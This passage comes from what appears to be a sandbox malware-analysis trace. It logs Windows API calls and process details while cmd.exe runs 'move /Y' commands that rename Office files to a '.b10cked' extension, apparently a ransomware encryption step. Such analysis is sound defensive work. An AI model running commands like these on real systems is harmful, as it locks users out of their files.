\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" [0161.738] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" [0161.738] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0161.738] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0161.738] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.738] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0161.739] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0161.739] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0161.739] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0161.739] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0161.739] GetEnvironmentStringsW () returned 0x2d2360* [0161.739] FreeEnvironmentStringsW (penv=0x2d2360) returned 1 [0161.739] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.739] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.739] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0161.739] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0161.739] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0161.739] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0161.739] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0161.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f738 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.739] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f738, lpFilePart=0x14f734 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f734*="Desktop") returned 0x18 [0161.739] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.739] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.739] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.740] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.740] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.740] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0161.740] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0161.740] GetEnvironmentStringsW () returned 0x2d0210* [0161.740] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.740] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.741] GetConsoleOutputCP () returned 0x1b5 [0161.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.741] GetUserDefaultLCID () returned 0x409 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f878, cchData=128 | out: lpLCData="0") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f878, cchData=128 | out: lpLCData="0") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f878, cchData=128 | out: lpLCData="1") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0161.742] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0161.743] GetConsoleTitleW (in: lpConsoleTitle=0x2c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0161.744] _wcsicmp (_String1="move", _String2=")") returned 68 [0161.744] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0161.744] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0161.744] _wcsicmp (_String1="IF", _String2="move") returned -4 [0161.744] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0161.744] _wcsicmp (_String1="REM", _String2="move") returned 5 [0161.744] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0161.748] GetConsoleTitleW (in: lpConsoleTitle=0x14f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.749] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CD") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="REN") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="SET") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="MD") returned 11 [0161.749] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0161.749] _wcsicmp (_String1="move", _String2="RD") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0161.749] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="VER") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="START") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0161.750] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0161.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.757] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f32c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f324, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f324*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0161.759] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0161.759] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0161.759] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0161.759] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~2.trx")) returned 0x2020 [0161.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.760] SetErrorMode (uMode=0x1) returned 0x0 [0161.760] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x14ecb4, lpFilePart=0x14ec9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", lpFilePart=0x14ec9c*="WWINTL~2.TRX") returned 0x3c [0161.760] SetErrorMode (uMode=0x0) returned 0x1 [0161.760] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0161.760] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0161.760] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0161.760] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~2.trx")) returned 0x2020 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.760] SetErrorMode (uMode=0x1) returned 0x0 [0161.760] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x14f130, lpFilePart=0x14eec8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", lpFilePart=0x14eec8*="WWINTL~2.TRX") returned 0x3c [0161.760] SetErrorMode (uMode=0x0) returned 0x1 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.761] SetErrorMode (uMode=0x1) returned 0x0 [0161.761] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f338, lpFilePart=0x14eec8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x14eec8*="WWINTL.REST.trx_dll.b10cked") returned 0x4b [0161.761] SetErrorMode (uMode=0x0) returned 0x1 [0161.761] SetLastError (dwErrCode=0x0) [0161.761] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll.b10cked")) returned 0xffffffff [0161.761] GetLastError () returned 0x2 [0161.761] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e844, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e844) returned 0x2d2130 [0161.761] FindNextFileW (in: hFindFile=0x2d2130, lpFindFileData=0x14e844 | out: lpFindFileData=0x14e844) returned 0 [0161.762] GetLastError () returned 0x12 [0161.762] FindClose (in: hFindFile=0x2d2130 | out: hFindFile=0x2d2130) returned 1 [0161.763] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x2d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2d1cc0) returned 0x2d2130 [0161.763] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0161.763] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x14eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0161.763] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll")) returned 0x2020 [0161.763] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0161.764] FindClose (in: hFindFile=0x2d2130 | out: hFindFile=0x2d2130) returned 1 [0161.764] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ea90 | out: _Buffer=" 1") returned 9 [0161.764] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.764] GetFileType (hFile=0x7) returned 0x2 [0161.764] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0161.764] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ea1c | out: lpMode=0x14ea1c) returned 1 [0161.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.765] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ea50 | out: lpConsoleScreenBufferInfo=0x14ea50) returned 1 [0161.765] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0161.765] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ea90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0161.765] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ea74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ea74*=0x1a) returned 1 [0161.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.766] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.766] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.766] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.766] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.766] SetConsoleInputExeNameW () returned 0x1 [0161.766] GetConsoleOutputCP () returned 0x1b5 [0161.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.766] exit (_Code=0) Process: id = "276" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22311 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22312 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22313 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22314 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 22315 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22316 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22317 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22318 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22319 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22320 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22375 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22376 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 22377 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 22378 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22379 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22380 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22381 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22382 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22383 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22384 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22385 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22386 start_va = 0x7f6f0000 end_va = 